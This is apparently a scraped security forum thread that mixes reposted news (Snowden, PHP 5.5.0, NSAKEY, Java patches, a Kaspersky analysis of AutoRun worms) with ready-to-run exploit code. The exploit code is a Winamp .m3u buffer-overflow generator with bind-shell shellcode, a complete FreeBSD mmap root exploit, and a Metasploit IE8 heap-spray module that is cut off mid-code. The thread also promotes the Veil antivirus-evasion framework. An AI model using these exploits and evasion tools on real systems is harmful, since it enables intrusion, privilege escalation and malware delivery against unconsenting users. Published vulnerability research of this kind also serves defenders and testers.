Nytro

HKSAR Government issues statement on Edward Snowden *************************************************** The HKSAR Government today (June 23) issued the following statement on Mr Edward Snowden: Mr Edward Snowden left Hong Kong today (June 23) on his own accord for a third country through a lawful and normal channel. The US Government earlier on made a request to the HKSAR Government for the issue of a provisional warrant of arrest against Mr Snowden. Since the documents provided by the US Government did not fully comply with the legal requirements under Hong Kong law, the HKSAR Government has requested the US Government to provide additional information so that the Department of Justice could consider whether the US Government's request can meet the relevant legal conditions. As the HKSAR Government has yet to have sufficient information to process the request for provisional warrant of arrest, there is no legal basis to restrict Mr Snowden from leaving Hong Kong. The HKSAR Government has already informed the US Government of Mr Snowden's departure. Meanwhile, the HKSAR Government has formally written to the US Government requesting clarification on earlier reports about the hacking of computer systems in Hong Kong by US government agencies. The HKSAR Government will continue to follow up on the matter so as to protect the legal rights of the people of Hong Kong. Ends/Sunday, June 23, 2013 Issued at HKT 16:05 NNNN Sursa: http://www.info.gov.hk/gia/general/201306/23/P201306230476.htm

Topic stupid => cobra89 - ban (3 zile) Posturi inutile si care nu au legatura cu subiectul - warn.

[h=1]PHP 5.5.0 Release Announcement[/h] The PHP development team is proud to announce the immediate availability of PHP 5.5.0. This release includes a large number of new features and bug fixes. The key features of PHP 5.5.0 include: Added generators and coroutines. Added the finally keyword. Added a simplified password hashing API. Added support for constant array/string dereferencing. Added scalar class name resolution via ::class. Added support for using empty() on the result of function calls and other expressions. Added support for non-scalar Iterator keys in foreach. Added support for list() constructs in foreach statements. Added the Zend OPcache extension for opcode caching. The GD library has been upgraded to version 2.1 adding new functions and improving existing functionality. A lot more improvements and fixes. Changes that affect compatibility: PHP logo GUIDs have been removed. Windows XP and 2003 support dropped. Case insensitivity is no longer locale specific. All case insensitive matching for function, class and constant names is now performed in a locale independent manner according to ASCII rules. For users upgrading from PHP 5.4, a migration guide is available detailing the changes between 5.4 and 5.5.0. For a full list of changes in PHP 5.5.0, see the ChangeLog. Sursa: PHP: PHP 5.5.0 Release Announcement

[h=1]Winamp 5.12 (.m3u) - Stack Based Buffer Overflow[/h] # Exploit Title: Winamp 5.12 .m3u stack based buffer overflow # Date: 16 June 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.winamp.com/ # Software Link: http://www.oldapps.com/winamp.php?old_winamp=211 # Version: 5.12 # Tested on: Windows XP Professional SP2, English # CVE: CVE-2006-0720 # BID: 16785 # # Description from CVE-2006-0720 # Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 # allows user-assisted attackers to cause a denial of service # (crash) and possibly execute arbitrary code via a crafted # .m3u file that causes an incorrect strncpy function call # when the player pauses or stops the file. # # # 1. Launch Winamp # 2. Drag boom.m3u into Winamp window # 3. Check for bind shell on port 28876 # import struct header = "#EXTM3U\n" header += "#EXTINF:1234,Pwnage Rock\n" # NTDisplayString egghunter = ( "\x90" * 64 + "\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58" + "\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" + "\x77\x30\x30\x74" + # w00t "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90" * 30 ) junk = "\x41" * 262 + "\x90" * 100 + egghunter # bind shell on port 28876 # https://code.google.com/p/w32-bind-ngs-shellcode/ # msfencode -i w32-bind-ngs-shellcode.bin -b "\x00\x0a\x0d\x5c" # [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1) shellcode = ( "w00tw00t" + "\x90" * 239 + "\xbf\x26\x63\xb2\x20\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9" + "\xb1\x36\x83\xea\xfc\x31\x7a\x10\x03\x7a\x10\xc4\x96\x83" + "\xe9\x6c\xd2\x95\xd9\xe7\x92\x59\x91\x81\x46\xe9\xcb\x65" + "\xfc\x93\x33\xfe\x34\x54\x7b\x18\x4c\x57\xd2\x70\x9c\xc8" + "\xe6\xb2\x88\x90\x5e\xc5\x3b\x35\xe8\xa6\xb5\x5d\x9f\x5e" + "\x70\x5e\x89\x52\x52\xad\x40\x8d\x73\xde\xf9\x10\x2d\x60" + "\xaf\xc5\x9c\xe1\xa0\xc5\xba\xa9\xb5\x48\xff\xbe\x96\x6f" + "\x87\xc1\xcd\x04\x3c\xe2\x10\xf3\x95\xd3\xc0\x41\x91\x20" + "\x74\x44\x4b\xfc\x40\xea\xa7\x8c\x84\x36\xfb\x1f\xa0\x41" + "\x3e\xc7\x3f\x46\x61\x8c\x8b\xbc\x9f\x7b\x04\x0b\x8b\x2a" + "\x90\x38\xa8\xcd\x4f\x37\x38\xce\x8b\xd6\x12\x51\xad\xd1" + "\x11\x5a\x5f\xbf\xdd\x09\xa0\xef\x89\x38\xde\x31\x45\x36" + "\x6e\x13\x04\x47\x40\x06\xa9\x68\xf4\xd9\x79\x77\x08\x56" + "\xb6\xed\xe7\x3f\x14\xa4\xf8\x6f\xe3\x87\x73\x77\xdd\xd5" + "\x2e\xef\x7d\xb7\xaa\xcf\x0c\x3b\x17\x37\xa4\x6f\xfc\x81" + "\xfd\x86\x02\x59\x85\x65\x21\x36\xdb\xc7\x7b\x7e\x9c\x08" + "\x73\x29\x71\x85\xd3\x87\x8a\x7f\x38\xac\x33\x7c\x29\x78" + "\x44\x83\x55" ) # 022B368C , call ecx , C:\Progam Files\Winamp\pxsdkpls.dll ret = struct.pack("<I", 0x022B368C) # for some reason eip doesn't get overwritten and Winamp # crashes differently unless the 4th byte after ret is # a 0xB0. there's probably an easier way to do this but # this is what the fuzzer found first so... wtf = "\x43\x43\x43\xB0" f = open("boom.m3u", "w") f.write(header + junk + shellcode + ret + wtf) f.close() print "Created boom.m3u" print "1. Open Winamp" print "2. Drag boom.m3u into Winamp window" print "3. Check for bind shell on port 28876" Sursa: Winamp 5.12 (.m3u) - Stack Based Buffer Overflow

[h=1]Memcached Remote Denial of Service PoC[/h] A long time ago, in 2011, a rather serious vulnerability was reported in Memcached. It is now 2013, and the vulnerability still exists in the latest version on the memcached Google Code page. The report is here: https://code.google.com/p/memcached/issues/detail?id=192 Now, as you can see, by sending a specially crafted packet, we can cause Memcached to segfault, and essentially die. Memcached is used by a lot of high profile sites to speed up page load times, and killing it would impact a bit on site performance, so I was rather curious as to why this bug had not yet been killed. As you can see from the report, the vulnerability is trivial to exploit. Just send the magic packet of death and it kills the memcached service. I tried to get remote code execution from it, but had no luck at all. Perhaps one of you might have more luck! memcached ded Exploit code available to download here: killthebox.py As always, responsible use is encouraged. Killing $(big website) memcached might get you in trouble, so don’t do it. As for the memcached devs: You have known about this for two bloody years and never fixed it. This is terribly irresponsible of you. Fix it. Sursa: Memcached Remote Denial of Service PoC | Insecurety Research

[h=2]FreeBSD mmap Privilege Escalation Exploit[/h] /** * FreeBSD privilege escalation CVE-2013-2171 (credits Konstantin Belousov & Alan Cox) * * tested on FreeBSD 9.1 * ref: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc * * @_hugsy_ * * Syntax : $ id uid=1001(user) gid=1001(user) groups=1001(user) $ gcc -Wall ./mmap.c && ./a.out [+] Saved old '/sbin/ping' [+] Using mmap-ed area at 0x281a4000 [+] Attached to 3404 [+] Copied 4917 bytes of payload to '/sbin/ping' [+] Triggering payload # id uid=0(root) gid=0(wheel) egid=1001(user) groups=1001(user),0(wheel) * * Note : TARGET (default /sbin/ping) will lose its SUID bit on restore, must be restored by hand * */ #include <sys/mman.h> #include <sys/types.h> #include <sys/ptrace.h> #include <sys/wait.h> #include <sys/stat.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <errno.h> #define LEN 1000*getpagesize() #define TARGET "/sbin/ping" // will lose its SUID bit on restore, must be restored by hand void kaboom(int pid, caddr_t addr) { int nb, i, a, fd, n; char buf[60000] = {0,}; a = i = 0; fd = open(TARGET, O_RDONLY); nb = read(fd, buf, 60000); close(fd); printf("[+] Saved old '%s'\n", TARGET); printf("[+] Using mmap-ed area at %p\n", addr); if (ptrace(PT_ATTACH, pid, 0, 0) < 0) { perror("[-] ptrace(PT_ATTACH) failed"); return; } printf("[+] Attached to %d\n", pid); wait(NULL); fd = open("./sc.c", O_WRONLY|O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH); write(fd, "#include <stdio.h>\nmain(){ char* s[]={\"/bin/sh\",NULL};setuid(0);execve(s[0],s,0); }\n",84); close(fd); if (system("gcc -o ./sc ./sc.c") != 0) { perror("[-] gcc"); return; } fd = open("./sc", O_RDONLY); while (1) { int a; int n = read(fd, &a, sizeof(int)); if (n <= 0) break; if (ptrace(PT_WRITE_D, pid, addr+i, a) < 0) { perror("[-] ptrace(PT_WRITE_D) failed"); return; } i+=n; } close(fd); printf("[+] Copied %d bytes of payload to '%s'\n", i, TARGET); printf("[+] Triggering payload\n"); system(TARGET); printf("[+] Restoring '%s'\n", TARGET); for (n=0, i=0; n<nb; n++) { if (ptrace(PT_WRITE_D, pid, addr+n, *(buf+n)) < 0) { perror("[-] ptrace(PT_WRITE_D) failed"); return; } } ptrace(PT_DETACH, pid, 0, 0); printf("[+] Done\n"); return; } void dummy(int fd, caddr_t addr) { sleep(1); munmap(addr, LEN); close(fd); return; } int main(int argc, char** argv, char** envp) { int fd = open(TARGET, O_RDONLY); caddr_t addr = mmap(NULL, LEN, PROT_READ, MAP_SHARED, fd, 0); pid_t forked_pid = fork(); switch(forked_pid) { case -1: return -1; case 0: dummy(fd, addr); break; default: munmap(addr, LEN); close(fd); kaboom(forked_pid, addr); wait(NULL); break; } return 0; } Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Ei au inventat hackingul.

Vedem in weekend

Nu vazusem acel "Self".

Cum il exploatezi?

New Bounty Program Details - Security Research & Defense - Site Home - TechNet Blogs

Nu am scris eu. Ar fi foarte multe lucruri de spus. Aveti putina rabdare...

[h=3]Evidence that the NSA Is Storing Voice Content, Not Just Metadata[/h] Interesting speculation that the NSA is storing everyone's phone calls, and not just metadata. Definitely worth reading. I expressed skepticism about this just a month ago. My assumption had always been that everyone's compressed voice calls is just too much data to move around and store. Now, I don't know. There's a bit of a conspiracy-theory air to all of this speculation, but underestimating what the NSA will do is a mistake. General Alexander has told members of Congress that they can record the contents of phone calls. And they have the technical capability. Earlier reports have indicated that the NSA has the ability to record nearly all domestic and international phone calls -- in case an analyst needed to access the recordings in the future. A Wired magazine article last year disclosed that the NSA has established "listening posts" that allow the agency to collect and sift through billions of phone calls through a massive new data center in Utah, "whether they originate within the country or overseas." That includes not just metadata, but also the contents of the communications. William Binney, a former NSA technical director who helped to modernize the agency's worldwide eavesdropping network, told the Daily Caller this week that the NSA records the phone calls of 500,000 to 1 million people who are on its so-called target list, and perhaps even more. "They look through these phone numbers and they target those and that's what they record," Binney said. Brewster Kahle, a computer engineer who founded the Internet Archive, has vast experience storing large amounts of data. He created a spreadsheet this week estimating that the cost to store all domestic phone calls a year in cloud storage for data-mining purposes would be about $27 million per year, not counting the cost of extra security for a top-secret program and security clearances for the people involved. I believe that, to the extent that the NSA is analyzing and storing conversations, they're doing speech-to-text as close to the source as possible and working with that. Even if you have to store the audio for conversations in foreign languages, or for snippets of conversations the conversion software is unsure of, it's a lot fewer bits to move around and deal with. And, by the way, I hate the term "metadata." What's wrong with "traffic analysis," which is what we've always called that sort of thing? Sursa: Schneier on Security: Evidence that the NSA Is Storing Voice Content, Not Just Metadata

[h=1]Veil – AV Evasion[/h] [h=1]Veil v2.0 : Towards a True Framework[/h] June 17, 2013 by The Grayhound Repo Location: https://github.com/ChrisTruncer/Veil Team Veil is proud to announce the release of Veil v2.0. This drastically reworked version of the Veil AV-evasion framework incorporates a new structure, a slew of new features, and a variety of new payloads: New Structure Veil has moved from a single flat file towards a truly modular framework: Payload modules dropped into ./modules/payloads/[language] are loaded into the framework automatically Common reusable functions are stored in various files in ./modules/common/* Source/compiled files are output by default to ./output/source/ and ./output/compiled/ ./config/update.py is executed automatically on first run, producing a common configuration file at ./config/veil.py, which can be edited manually External tools used by payloads are stored in ./tools/ ./doc/* contains pydoc generated documentation for the framework [*]A tutorial describing how to develop payload modules is forthcoming. New features Veil’s menus and interface have been redesigned for increased usability. One of the common requests for Veil was the inclusion of additional msfvenom shellcode payloads. To incorporate this, we built in automatic crawling of the metasploit /windows/* payload tree and the extraction of necessary payload parameters. The payloads should tab complete within the shellcode selection menu, in msfvenom windows/PAYLOAD format. Tab completion has also been added in a variety of places around the framework, including most menus, LHOST for IP completion, and LPORT for 4444 completion. Try it out! A new python ‘crypter’ named ‘pyherion’ (inspired by Null Security’s Hyperion) has been introduced, which encapsulates python payload files in an AES/base64 encoded wrapper that dynamically decodes/decrypts the python code in memory and executes it. A standalone version has also been introduced in ./tools/pyherion.py . A short post explaining its implementation details will be forthcoming. Command line switches have been implemented for almost all options. Type ./Veil.py -h for details. New payloads C payloads – Using both a void pointer reference and direct injection into memory with VirrtualAlloc calls Powershell – VirtualAlloc injection, MSF-psexec formatted resource file generation, and download/execution of a secondary payload. C# payloads – VirtualAlloc and base64 obfuscated payloads have been introduced, along with C# .exe compilation. Native payloads – hyperion and pescrambler Sursa: https://www.veil-evasion.com/

[h=1]Stagiu de practic? la Guvern pentru tinerii studen?i sau absolven?i cu no?iuni de baz? IT. Ce criterii trebuie s? îndeplineasc?[/h]Studen?ii sau absolven?ii de programe universitare de licen?? cu vârsta de pân? la 25 ani ?i cuno?tin?e de baz? în domeniul IT pot aplica pân? la 1 iulie pentru un program de practic? de specialitate (internship) la Cancelaria primului-ministru sau Secretariatul General al Guvernului. Ac?iunea este ini?iat? în baza programului de guvernare, care prevede crearea unui sistem real de internship în administra?ia public? central? ?i local? pentru studen?ii cu rezultate deosebite, informeaz? Executivul. Un program de internship presupune un stagiu de practic? la locul de munc? pentru cariere profesioniste, destinat studen?ilor sau absolven?ilor de studii universitare, prin care ace?tia se pot familiariza cu specificul unei structuri ?i cunosc fluxul de activit??i sprijinind direct angaja?ii la îndeplinirea activit??ilor zilnice. Pentru a fi inclu?i în program, tinerii trebuie s? îndeplineasc?, cumulativ, o serie de criterii de eligibilitate, respectiv s? de?in? cet??enia român?, s? aib? vârsta de pân? la 25 de ani, s? fie studen?i ori tineri absolven?i ai programelor universitare de licen??, s? cunoasc? bine cel pu?in o limb? str?in? de circula?ie interna?ional? ?i s? aib? cuno?tin?e de baz? în domeniul IT (respectiv cuno?tin?e avansate pentru aplica?ii la Direc?ia Servicii Online ?i Design). Candida?ilor ce vor fi ale?i pentru lista scurt? li se vor solicita materiale justificative suplimentare în sprijinul aplica?iei lor. Formularul de aplica?ie poate fi accesat din pagina de internet internship.gov.ro, iar termenul limit? pentru depunerea aplica?iilor, prin e-mail c?tre adresa oficial? a programului internship@gov.ro, este 1 iulie 2013 inclusiv. Aplica?iile primite ulterior nu vor fi luate în considerare. Tinerii selecta?i vor fi repartiza?i, în raport cu competen?ele acestora, la Cancelaria primului-ministru sau Secretariatul General al Guvernului. Sursa: Stagiu de practic? la Guvern pentru tinerii studen?i sau absolven?i cu no?iuni de baz? IT. Ce criterii trebuie s? îndeplineasc? - Mediafax

How NSA access was built into Windows Duncan Campbell 04.09.1999 Careless mistake reveals subversion of Windows by NSA. A CARELESS mistake by Microsoft programmers has revealed that special access codes prepared by the US National Security Agency have been secretly built into Windows. The NSA access system is built into every version of the Windows operating system now in use, except early releases of Windows 95 (and its predecessors). The discovery comes close on the heels of the revelations earlier this year that another US software giant, Lotus, had built an NSA "help information" trapdoor into its Notes system, and that security functions on other software systems had been deliberately crippled. The first discovery of the new NSA access system was made two years ago by British researcher Dr Nicko van Someren. But it was only a few weeks ago when a second researcher rediscovered the access system. With it, he found the evidence linking it to NSA. Computer security specialists have been aware for two years that unusual features are contained inside a standard Windows software "driver" used for security and encryption functions. The driver, called ADVAPI.DLL, enables and controls a range of security functions. If you use Windows, you will find it in the C:\Windows\system directory of your computer. [TABLE=class: img, width: 100%] [TR] [TD] [/TD] [/TR] [/TABLE] ADVAPI.DLL works closely with Microsoft Internet Explorer, but will only run cryptographic functions that the US governments allows Microsoft to export. That information is bad enough news, from a European point of view. Now, it turns out that ADVAPI will run special programmes inserted and controlled by NSA. As yet, no-one knows what these programmes are, or what they do. Dr Nicko van Someren reported at last year's Crypto 98 conference that he had disassembled the ADVADPI driver. He found it contained two different keys. One was used by Microsoft to control the cryptographic functions enabled in Windows, in compliance with US export regulations. But the reason for building in a second key, or who owned it, remained a mystery. A second key Two weeks ago, a US security company came up with conclusive evidence that the second key belongs to NSA. Like Dr van Someren, Andrew Fernandez, chief scientist with Cryptonym of Morrisville, North Carolina, had been probing the presence and significance of the two keys. Then he checked the latest Service Pack release for Windows NT4, Service Pack 5. He found that Microsoft's developers had failed to remove or "strip" the debugging symbols used to test this software before they released it. Inside the code were the labels for the two keys. One was called "KEY". The other was called "NSAKEY". Fernandes reported his re-discovery of the two CAPI keys, and their secret meaning, to "Advances in Cryptology, Crypto'99" conference held in Santa Barbara. According to those present at the conference, Windows developers attending the conference did not deny that the "NSA" key was built into their software. But they refused to talk about what the key did, or why it had been put there without users' knowledge. A third key?! But according to two witnesses attending the conference, even Microsoft's top crypto programmers were astonished to learn that the version of ADVAPI.DLL shipping with Windows 2000 contains not two, but three keys. Brian LaMachia, head of CAPI development at Microsoft was "stunned" to learn of these discoveries, by outsiders. The latest discovery by Dr van Someren is based on advanced search methods which test and report on the "entropy" of programming code. Within the Microsoft organisation, access to Windows source code is said to be highly compartmentalized, making it easy for modifications to be inserted without the knowledge of even the respective product managers. Researchers are divided about whether the NSA key could be intended to let US government users of Windows run classified cryptosystems on their machines or whether it is intended to open up anyone's and everyone's Windows computer to intelligence gathering techniques deployed by NSA's burgeoning corps of "information warriors". According to Fernandez of Cryptonym, the result of having the secret key inside your Windows operating system "is that it is tremendously easier for the NSA to load unauthorized security services on all copies of Microsoft Windows, and once these security services are loaded, they can effectively compromise your entire operating system". The NSA key is contained inside all versions of Windows from Windows 95 OSR2 onwards. "For non-American IT managers relying on Windows NT to operate highly secure data centres, this find is worrying", he added. "The US government is currently making it as difficult as possible for "strong" crypto to be used outside of the US. That they have also installed a cryptographic back-door in the world's most abundant operating system should send a strong message to foreign IT managers". "How is an IT manager to feel when they learn that in every copy of Windows sold, Microsoft has a 'back door' for NSA - making it orders of magnitude easier for the US government to access your computer?" he asked. Can the loophole be turned round against the snoopers? Dr van Someren feels that the primary purpose of the NSA key inside Windows may be for legitimate US government use. But he says that there cannot be a legitimate explanation for the third key in Windows 2000 CAPI. "It looks more fishy", he said. Fernandez believes that NSA's built-in loophole can be turned round against the snoopers. The NSA key inside CAPI can be replaced by your own key, and used to sign cryptographic security modules from overseas or unauthorised third parties, unapproved by Microsoft or the NSA. This is exactly what the US government has been trying to prevent. A demonstration "how to do it" program that replaces the NSA key can be found on Cryptonym's website. According to one leading US cryptographer, the IT world should be thankful that the subversion of Windows by NSA has come to light before the arrival of CPUs that handles encrypted instruction sets. These would make the type of discoveries made this month impossible. "Had the next-generation CPU's with encrypted instruction sets already been deployed, we would have never found out about NSAKEY." Sursa: How NSA access was built into Windows | Telepolis

http://fbcdn-sphotos-g-a.cloudliv.net/hphotos-ak-ash4/5223013_371023452991370_522301357_n.jpgb

[h=1]AutoRun. Reloaded[/h]Konstantin Markov Kaspersky Lab Expert Posted June 13, 11:17 GMT Recent months have produced little of interest among worms written in Java and script languages such as JavaScript and VBScript. The main reason behind this was the limited proficiency of the virus writers, whose creations were anything but remarkable. However, a couple of malware samples grabbed our attention; their complexity is testimony to the fact that professionals sometimes get involved as well. Kaspersky Lab’s products detect these special worms as Worm.JS.AutoRun and Worm.Java.AutoRun. They are also detected by heuristic methods as HEUR:Worm.Script.Generic and HEUR:Worm.Java.Generic respectively. These two worms have three key features in common: heavy obfuscation, backdoor-type essential payloads, and similar methods of propagation. Both worms spread by copying themselves and the configuration file autorun.inf into the root folders of logical volumes of removable storage media and network disks. If these infected storages are opened on other computers, the infection can spread. Having infected the operating system and established a foothold on the victim computer, the malicious programs deploy their principal payload. For months, the number of AutoRun worms detected on Kaspersky Lab users’ computers remained essentially unchanged. According to Kaspersky Security Network data, half of all script worms spread themselves this way. As for Java worms, this is not their usual method of propagation. However, in the last three months we have seen a dramatic rise in the number of new Worm.Java.AutoRun modifications. Detection levels for unique script worms, AutoRun script worms, and heuristically detected AutoRun script worms April 2012 – May 2013 Detection levels for Java worms, AutoRun Java worms, and heuristically detected AutoRun Java worms August 2011 – May 2013 Both worms are polymorphic: they modify their bodies during propagation, complicating their detection. This is one of the reasons why they have become more prominent compared with “regular” worms. Below is a narrative of what we have encountered. [h=2]Worm.Java.AutoRun[/h] There are not many Java-based resident malware programs for PC, and worms are especially rare. So we undertook a detailed analysis of this sample. The worm deploys itself on an infected computer in the form of four files: Java archive: the core component; its name changes in each infection attempt. It is located in the users’ temporary folder %TEMP%\jar_cache*.tmp. Autorun.inf: a configuration file which ensures the worm is launched automatically when infected external storage media or a mounted network drive is opened. DLL file: an auxiliary (Win 32) DLL which is responsible for part of the propagation task. The name of this file also varies: it is defined at the time when the computer is infected. The DLL is copied to the user’s temporary folder: %TEMP%\hsperfdata_%USERNAME%\ Java.exe is a legal executable file of the pre-installed JAVA package. The worm uses it to ensure it can always load itself into the memory of an infected computer. When an infection occurs, this executable file is coped from %ProgramFiles% to the user’s temporary folder (beside the above DLL) and is given a name associated with a system process, e.g. winlogon, csrss, or services. Then it is executed using the launch parameters of the Java archive, which is the core component. Fragment of the class-file of a malicious JAVA archive Once initialized, the malicious Java archive extracts a dll from itself, copies itself to the temporary user catalogue and also copies the executive file Java.exe from %ProgramFiles% to the same catalogue, giving it a “trusted” name and executing it with the launch parameters of the duplicated Java archive. Then the Java archive injects the above library into the process created to distribute the worm to any available network sections and removable media. The launched malware occasionally sends requests to a command center to receive instructions from the cybercriminal. As well as these quirks, this worm also uses strong obfuscation. Here a packer is used in conjunction with Zelix KlassMaster obfuscation. Also, as mentioned above, the worm is polymorphic. This makes it more difficult for antivirus solutions to detect. According to Kaspersky Security Network, the worm is most widely distributed in India and Malaysia. The overall picture is shown on the map below. Geographical distribution of users protected against Worm.Java.AutoRun, January-May 2013 According to the same data, the worm was most frequently picked up by Kaspersky Lab products at the end of May. Most of these detections referred to its most recent modifications, those which provoked the sudden spike in detections. This worm is still actively distributing itself, so we are continuing to closely monitor its activities. Number of users protected against Worm.Java.AutoRun, April-May 2013 [h=2]Worm.JS.AutoRun[/h] The distribution model of this worm not only uses the above method with autorun.inf, but also FTP-servers, file share sites, shared folders and CD/DVDs burned on the infected computers. The worm multiplies itself in catalogues and adds its launch to auto launch. At this time it checks the environment where it was launched. If the worm is launched on a non-virtual machine, it starts to search for active monitoring and PC protection tools. If they are detected, the worm terminates their work. The malware receives commands via a file downloaded from the command center. These instructions are mostly about collecting information from the infected system. In particular, cybercriminals want the worm to gather information about the system, the user and the installed software. Like Worm.Java.AutoRun, this sample is well-encrypted and can change its form in different infections. Code fragment for Worm.JS.AutoRun Like the Java worm, this malware is most widespread in Southeast Asia, though this variant is more active in Vietnam and Indonesia. Geographical distribution of users protected from Worm.JS.AutoRun from the beginning of 2013 to the end of May, 2013 Number of users protected from Worm.JS.AutoRun in the beginning of 2013 till the end of May, 2013 In this diagram you can see the number of users protected with the signature method only. Far more users are protected with heuristic methods, as shown in the first diagram. According to Kaspersky Security Network data, Windows XP is widely used in those countries with large numbers of malware detections. More recent Microsoft versions ask users to confirm autorun execution, which decreases the chances of getting infected. Starting from Windows 7, only CD/DVD carriers are allowed to run automatically. When using external storage devices (for instance, a USB flash drive), autorun is switched off. In order to protect your computer from infection, we advise you to update critical OS units and antivirus databases installed on the computer. You will find the guidelines about how to set the autorun function and links to updates in the following Microsoft article: http://support.microsoft.com/kb/967715 Sursa: AutoRun. Reloaded - Securelist

[h=1]Critical Java SE update due Tuesday fixes 40 flaws[/h] [h=2]And yes, most are remotely exploitable[/h] By Neil McAllister in San Francisco, 14th June 2013 Thought your Java security woes were behind you? Think again. Oracle is planning to release a Critical Patch Update on Tuesday that affects multiple versions of Java, and it's another doozy. According to Oracle's security announcement, the patch pack addresses 40 different vulnerabilities. All update levels of Java SE 5, 6, and 7 are affected by the flaws, as are all versions of JavaFX. Of the 40 bugs, all but three are remotely exploitable over a network without the need for a username or password. Yes, that's bad. Oracle ranks the severity of its flaws using the Common Vulnerability Scoring System (CVSS), and the top-ranked bug in this particular update rates a 10.0 – the highest possible score. "Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible," the database giant helpfully suggests. Oracle ordinarily releases Critical Patch Updates four times a year on a set schedule, but this will already be the fourth such update issued in 2013. The first shipped on February 1, but Oracle reissued it later in the month with additional fixes. It also scheduled another, previously unplanned update for April. Each of those earlier updates contained upward of 40 fixes, and each similarly addressed flaws that rated 10.0 on the CVSS severity scale. Oracle has not yet disclosed which vulnerabilities will be patched by the June update, but previous Critical Patch Updates have patched vulnerabilities in a wide range of Java APIs and subsystems. These flaws could potentially affect a whole host of Java software and were not limited to programs running via the Java browser plugin, as has been the case with some previous Java exploits. Oracle plans to release its latest Java SE Critical Patch Update on June 18, 2013. After that, the next update is currently scheduled for October 15. ® Sursa: Critical Java SE update due Tuesday fixes 40 flaws • The Register

[h=1]Web Developer Security 1.0[/h] Raymond Forbes and I will be presenting Web Developer Security 1.0 on Tuesday, June 18th at 12:15 pm PDT. The training will be held in Mozilla’s Mountain View office and also broadcast online. We will cover a grab bag of proactive security measures Web Developers can take to protect their users and their site. Rather than focusing on how to attack a website, this training focuses on how you can safeguard your website from common threats. Some of the topics we will cover include Content Security Policy, X-Frame-Options, cookie security flags, iframe sandbox, content sanitization, and sensitive data encryption. Deploying these techniques will help protect your users and improve the security of your site. For those of you who are able to come watch the talk in person, there will be Punch & Pie! https://air.mozilla.org/web-security-training/ Sursa: Web Developer Security 1.0 | Mozilla Security Blog

[h=1]MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "8.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => Rank }) def initialize(info={}) super(update_info(info, 'Name' => "MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow", 'Description' => %q{ This module exploits an integer overflow vulnerability on Internet Explorer. The vulnerability exists in the handling of the dashstyle.array length for vml shapes on the vgx.dll module. This module has been tested successfully on Windows 7 SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target to use an info leak to disclose the ntdll.dll base address is provided. This target requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001). }, 'License' => MSF_LICENSE, 'Author' => [ 'Nicolas Joly', # Vulnerability discovery, PoC and analysis '4B5F5F4B', # PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2551' ], [ 'OSVDB', '91197' ], [ 'BID', '58570' ], [ 'MSB', 'MS13-037' ], [ 'URL', 'http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php' ], [ 'URL', 'http://binvul.com/viewthread.php?tid=311' ] ], 'Payload' => { 'Space' => 948, 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows 7 SP1 with JRE ROP', # default { 'Rop' => :jre, 'Offset' => '0x5f4' } ], # requires: # * ntdll.dll v6.1.7601.17514 (fresh W7SP1 installation) # * ntdll.dll v6.1.7601.17725 (MS12-001) [ 'IE 8 on Windows 7 SP1 with ntdll.dll Info Leak', { 'Rop' => :ntdll, 'Offset' => '0x5f4' } ] ], 'Privileged' => false, 'DisclosureDate' => "Mar 06 2013", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def exploit @second_stage_url = rand_text_alpha(10) @leak_param = rand_text_alpha(5) super end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) # Land the payload at 0x0c0c0c0c # For IE 8 js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { 